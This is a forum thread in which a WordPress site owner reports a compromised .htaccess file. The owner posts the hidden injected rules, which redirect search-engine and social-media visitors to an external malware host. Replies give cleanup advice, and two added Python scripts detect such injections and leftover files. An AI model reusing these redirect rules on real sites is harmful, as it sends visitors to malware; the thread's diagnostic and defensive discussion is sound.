
Hacked .htaccess file on wordpress blog

Discussion in 'Blogging' started by deancow, Oct 29, 2011.

  1. deancow

    deancow Power Member

    Joined:
    Jul 8, 2009
    Messages:
    653
    Likes Received:
    235
    hi
    Has anyone come across this before?
    I have a VPS with hostwind and I suddenly noticed when clicking on a search result of one of my sites on Google I was redirected to a malware site. It turns out my .htaccess file has been modified to redirect Google traffic to a 3rd party malware site.
    I have uploaded the old correct .htaccess files and just a few hours later they were reverted back to the ones with malicious code.
    I have set read only permissions on the .htaccess file to no avail.
    Reset the root password
    Reset the account password (ftp and account)
    Deleted any 3rd party plugins

    It looks like there is some malicious plugin or theme being used to modify the .htaccess file. Is there any way to find out which one it is, as I have over 30 domains on this account?

    thanks
     
  2. deancow

    deancow Power Member

    Joined:
    Jul 8, 2009
    Messages:
    653
    Likes Received:
    235
    This is the code being added, it's inserted 100 lines below my normal .htaccess code and indented so it's not easily found (you might have to scroll right to see it)

    PHP:
                                                                                                                            ErrorDocument 400 http://billing-white.ru/cname/index.php                                                                                                                        
                                                                                                                            
    ErrorDocument 401 http://billing-white.ru/cname/index.php                                                                                                                        
                                                                                                                            
    ErrorDocument 403 http://billing-white.ru/cname/index.php                                                                                                                        
                                                                                                                            
    ErrorDocument 404 http://billing-white.ru/cname/index.php                                                                                                                        
                                                                                                                            
    ErrorDocument 500 http://billing-white.ru/cname/index.php                                                                                                                        
                                                                                                                            
    <IfModule mod_rewrite.c>                                                                                                                        
                                                                                                                            
    RewriteEngine On                                                                                                                        
    RewriteCond %{HTTP_REFERER} .*google\.(.*) [OR]
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*ask\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*yahoo\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*baidu\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*youtube\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*wikipedia\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*qq\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*excite\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*altavista\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*msn\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*netscape\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*aol\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*hotbot\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*goto\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*infoseek\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*mamma\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*alltheweb\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*lycos\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*search\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*metacrawler\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*bing\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*dogpile\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*facebook\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*twitter\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*blog\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*live\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*myspace\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*mail\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*yandex\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*rambler\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*ya\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*aport\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*linkedin\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*flickr\.(.*)                                                                                                                        
                                                                                                                            
    RewriteRule ^(.*)$ http://billing-white.ru/cname/index.php [R=301,L]                                                                                                                        
                                                                                                                            
    </IfModule>                                                                                                                        
                                                                                                                                                                                                                                                    
     
  3. smrank

    smrank Newbie

    Joined:
    Aug 22, 2009
    Messages:
    16
    Likes Received:
    0
    I can't see the code
     
  4. deancow

    deancow Power Member

    Joined:
    Jul 8, 2009
    Messages:
    653
    Likes Received:
    235
    this should work
    PHP:

    ErrorDocument 400 http://billing-white.ru/cname/index.php
    ErrorDocument 401 http://billing-white.ru/cname/index.php
    ErrorDocument 403 http://billing-white.ru/cname/index.php
    ErrorDocument 404 http://billing-white.ru/cname/index.php
    ErrorDocument 500 http://billing-white.ru/cname/index.php
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*ask\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*baidu\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*youtube\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*wikipedia\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*qq\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*excite\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*altavista\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*msn\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*netscape\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*aol\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*hotbot\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*goto\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*infoseek\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*mamma\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*alltheweb\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*lycos\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*search\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*metacrawler\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*bing\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*dogpile\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*facebook\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*twitter\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*blog\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*live\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*myspace\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*mail\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*yandex\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*rambler\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*ya\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*aport\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*linkedin\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*flickr\.(.*)
    RewriteRule ^(.*)$ http://billing-white.ru/cname/index.php [R=301,L]
    </IfModule>
        
     
  5. shiningeyes

    shiningeyes BANNED BANNED

    Joined:
    Feb 7, 2011
    Messages:
    415
    Likes Received:
    297
    smrank scroll to the right...
     
  6. keinehabe

    keinehabe Supreme Member

    Joined:
    Nov 4, 2008
    Messages:
    1,207
    Likes Received:
    472
    Gender:
    Male
    Occupation:
    -= CEO =-
    Location:
    Heaven
    Home Page:
    hosting box is compromised, my best bet is to go to reinstall os on this box, change the password(s) then put back your sites :)

    ps. funny thing, like a couple of months ago I was looking about similar code :)
     
  7. account77

    account77 Registered Member

    Joined:
    Apr 3, 2009
    Messages:
    92
    Likes Received:
    91
    Location:
    127.0.0.1
    Same happening with my sites, I'm using justhost shared hosting :-s
     
  8. inboxfull

    inboxfull Registered Member

    Joined:
    Aug 23, 2009
    Messages:
    84
    Likes Received:
    48
    Occupation:
    Oil & Gas
    Location:
    Brunei
    Home Page:
    Try asking your hosting for help. Perhaps it could sort it out.
     
  9. natorob

    natorob Junior Member

    Joined:
    Jul 7, 2011
    Messages:
    189
    Likes Received:
    63
    Occupation:
    Job?!?!?
    Location:
    Denver CO
    Home Page:
    I had a similar problem a couple of months ago with a JustHost shared account as well.

    Call CS at JustHost; they're fast, and actually helpful. They'll show you what to do.

    And you should also check to see if Google has flagged your sites as well... That can be a pain to get them unflagged.
     
  10. deancow

    deancow Power Member

    Joined:
    Jul 8, 2009
    Messages:
    653
    Likes Received:
    235
    Thanks for the suggestions, currently waiting for my host to respond.
    Currently Google hasn't flagged any sites as malware but I might suspend the site's hosting for the time being, got to be better than being flagged as malware right?
     
  11. ADHD-Dude

    ADHD-Dude Power Member

    Joined:
    Apr 17, 2010
    Messages:
    592
    Likes Received:
    119
    Look for any file that shouldn't be on the server. The htaccess got modified using a plugin exploit and the hacker uploaded a script to take control of the site.
     
  12. deancow

    deancow Power Member

    Joined:
    Jul 8, 2009
    Messages:
    653
    Likes Received:
    235
    thanks, I have a sneaking suspicion it was caused by a plugin which I used to delete a load of old posts, called something like wp mass delete.
    I have removed it from all my wordpress sites so will have to wait and see if it comes back.
     
  13. gapster

    gapster Registered Member

    Joined:
    Aug 6, 2010
    Messages:
    61
    Likes Received:
    32
    Occupation:
    IM full time
    Location:
    USA NW
    Had similar hack on different host early Sept, and ADHD-Dude is correct, except in my case, hack was controlled by remote commercial hack package.

    In my case, hacker gained access through [uploads] and [images] folders and crawled nearly two dozen sites on my shared box.

    First: "Locked" all suspicious files with 000 permissions (needed to stop re-exploit)

    Second: Deleted and replaced all above. (footprints were non-showing images and extra js files)

    Third: Mine was related to "thumbs exploit" mentioned several months ago here at BHW. Replaced offending plugin.

    Fourth: They use the above exploit to do the same redirect code and the same "down-page shifted-to-right" mods that you included above. G'gle "Black Hole Exploit" to read more about potential severity of hack. (pretty nasty commercial software that you are fighting against. Do not take this one lightly IMHO)

    Fifth: I added BulletProof Security Plugin and LimitLoginAttempts and have been hack free for two months (hoping for three...)

    Good luck, hope this helps or reinforces your plans.
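
One way to run the file hunt described in the posts above, as an added example that is not from any poster: it walks a web root and lists scripts sitting in uploads or images folders, files with an image extension whose first bytes are not an image header (the "non-showing images" footprint), and anything modified within an hour of an .htaccess change. The extension list, the one-hour window, the function names and the demo tree are assumptions.

```python
import os
import tempfile
import time

SCRIPT_EXT = {".php", ".phtml", ".php5", ".phar"}   # assumed list of script types
UPLOAD_DIRS = {"uploads", "images"}                 # folders named in the post above
MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
         ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}

def triage(root, window=3600):
    """Return sorted (relative_path, reason) pairs to review by hand."""
    ht_times, files = [], []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if not os.path.isfile(path):          # skips broken symlinks
                continue
            if name == ".htaccess":
                ht_times.append(os.path.getmtime(path))
            else:
                files.append(path)
    flagged = set()
    for path in files:
        rel = os.path.relpath(path, root)
        folders = {p.lower() for p in rel.split(os.sep)[:-1]}
        ext = os.path.splitext(path)[1].lower()
        if ext in SCRIPT_EXT and folders & UPLOAD_DIRS:
            flagged.add((rel, "script in upload folder"))
        if ext in MAGIC:
            try:
                with open(path, "rb") as fh:
                    head = fh.read(8)
            except OSError:                       # e.g. a file locked with mode 000
                head = b""
            if not head.startswith(MAGIC[ext]):
                flagged.add((rel, "image extension, non-image content"))
        mtime = os.path.getmtime(path)
        if any(abs(mtime - t) <= window for t in ht_times):
            flagged.add((rel, "modified near .htaccess change"))
    return sorted(flagged)

def build_demo(root):
    """Constructed tree: .htaccess just rewritten, old files, two fresh drops."""
    up = os.path.join(root, "wp-content", "uploads")
    os.makedirs(up)
    old = time.time() - 30 * 86400
    samples = {
        os.path.join(root, ".htaccess"): (b"# constructed\n", None),
        os.path.join(root, "index.php"): (b"<?php // constructed\n", old),
        os.path.join(up, "photo.png"): (MAGIC[".png"] + b"\0" * 8, old),
        os.path.join(up, "banner.gif"): (b"<?php // constructed placeholder\n", None),
        os.path.join(up, "cache.php"): (b"<?php // constructed placeholder\n", None),
    }
    for path, (data, mtime) in samples.items():
        with open(path, "wb") as fh:
            fh.write(data)
        if mtime is not None:
            os.utime(path, (mtime, mtime))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo:
        build_demo(demo)
        for rel, reason in triage(demo):
            print(f"{reason:36} {rel}")
```

Modification times can be reset by whoever wrote the file, so the timing check narrows the search but does not clear a file it leaves unflagged.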
     
  14. Manny

    Manny Registered Member

    Joined:
    Jun 1, 2008
    Messages:
    97
    Likes Received:
    7
    Yep most of these "hacks" are from exploiting bad PHP scripts. Always check a script for security exploits by doing a google search to see if others are getting exploited or have in the past. Unless you're familiar with PHP, that's the best you can do to safeguard against that. Also wouldn't hurt to understand file permissions of the scripts you're using.
     
  15. jamesmorison

    jamesmorison Newbie

    Joined:
    Nov 7, 2011
    Messages:
    23
    Likes Received:
    2
    I was wondering if Google can ban a site for redirecting to malware sites?
     
  16. Greybeard

    Greybeard Junior Member

    Joined:
    Aug 27, 2011
    Messages:
    185
    Likes Received:
    18
    This is quite scary! Deancow, how could you tell the .htaccess file was compromised?

    I'm using WPSecurity and Block Bad Queries as my security plug-ins. Is this sufficient or do I need more?
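
An added example, not part of any post in this thread: a Python check for the signs visible in the injected block posted earlier (rules pushed far down the file, indented far to the right, ErrorDocument targets on an external host, and a RewriteRule to an external host guarded by HTTP_REFERER conditions), applied to every .htaccess under a web root. The thresholds, the function names and the sample file are assumptions; the sample is a shortened, constructed copy of the posted rules.

```python
import os
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
BLANK_RUN, INDENT = 20, 40   # assumed thresholds: blank lines / leading columns

# Constructed sample: stock WordPress rules, then the injected rules 100 lines down.
CLEAN = ("# BEGIN WordPress\n<IfModule mod_rewrite.c>\nRewriteEngine On\n"
         "RewriteCond %{REQUEST_FILENAME} !-f\nRewriteRule . /index.php [L]\n"
         "</IfModule>\n# END WordPress\n")
SAMPLE = CLEAN + "\n" * 100 + "".join(" " * 120 + rule + "\n" for rule in (
    "ErrorDocument 404 http://billing-white.ru/cname/index.php",
    "<IfModule mod_rewrite.c>", "RewriteEngine On",
    r"RewriteCond %{HTTP_REFERER} .*google\.(.*) [OR]",
    r"RewriteCond %{HTTP_REFERER} .*flickr\.(.*)",
    "RewriteRule ^(.*)$ http://billing-white.ru/cname/index.php [R=301,L]",
    "</IfModule>"))

def foreign_host(line, own_hosts):
    # Host of the first absolute URL on the line, or None if absent or ours.
    m = URL_RE.search(line)
    host = (urlparse(m.group(0)).hostname or "").lower() if m else ""
    return host if host and host not in own_hosts else None

def scan_htaccess(text, own_hosts=()):
    """Return (line_no, kind, detail) findings for one .htaccess body."""
    own = {h.lower() for h in own_hosts}
    findings, blank_run, referer_cond = [], 0, False
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            blank_run += 1
            continue
        if blank_run >= BLANK_RUN:
            findings.append((no, "blank-gap", f"{blank_run} blank lines above"))
        blank_run = 0
        indent = len(raw.expandtabs()) - len(raw.expandtabs().lstrip())
        if indent >= INDENT:
            findings.append((no, "deep-indent", f"{indent} columns"))
        directive = line.split(None, 1)[0].lower()
        host = foreign_host(line, own)
        if directive == "errordocument" and host:
            findings.append((no, "errordocument-external", host))
        elif directive == "rewritecond" and "%{http_referer}" in line.lower():
            referer_cond = True           # conditions bind to the next RewriteRule
        elif directive == "rewriterule":
            if host:
                kind = "referer-redirect" if referer_cond else "external-redirect"
                findings.append((no, kind, host))
            referer_cond = False
    return findings

def scan_tree(root, own_hosts=()):
    """Scan every .htaccess under root; return {path: findings} for hits only."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits[path] = scan_htaccess(fh.read(), own_hosts)
    return {p: f for p, f in hits.items() if f}

if __name__ == "__main__":
    print(*scan_htaccess(SAMPLE), sep="\n")
```

Pass the account's own domains as `own_hosts` so that ordinary canonical-host redirects are not reported.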